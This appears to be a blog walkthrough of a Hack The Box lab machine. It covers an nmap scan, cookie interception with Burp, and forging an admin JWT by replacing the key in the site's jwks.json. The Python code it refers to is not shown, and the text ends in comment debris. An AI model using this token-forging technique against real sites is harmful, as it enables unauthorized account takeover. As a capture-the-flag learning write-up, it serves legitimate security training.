IP Address :- 10.10.11.126 Connect with HTB VPN with your machine
root@kali:# openvpn <your VPN file name>
Penetration
Methodologies
First scan full network and find
Open ports and Running services (Nmap)
root@kali:# nmap -Pn -sS -sV -sC 10.10.11.126
As you can observe
from Nmap scanning result, There are only two ports open - 80, 22
Now open this IP in you web browser and we got a "Hackmedia" site there are a login and Register button
so I try to registered with a user "Reshav ji" Password "HACKthebox"
Now we have Three buttons first one for Buy something and second one for upload a pdf report and third for logout but not important for us
So Let's open Burp suit and intercept request and response
After decode this cookie we got a json file which are available on web let's download this file
root@kali:# wget http://10.10.11.126/static/jwks.json 
Let's open this file
We got a private key so i try to find a vulnerability for jwt and we got a website - https://book.hacktricks.xyz/pentesting-web/hacking-jwt-json-web-tokens
After read this article we need a RSA Public key now time to create a Key
Now use this pem file and generating a new key id from python code and if you not have jwk library please install
root@kali:# pip install jwcrypto
Now run this python code 
Now we got a kid value and :n value so let's change the value in jwks.json file like this
use this public key and create a new JWT token from admin user
so let's create a Python code for generating a new token
after write this python code let's run this code and we got a new authentication cookie 
Tags
.gif)
☠️☠️☠️☠️☠️☠️
ReplyDelete☠️☠️☠️☠️☠️☠️
ReplyDelete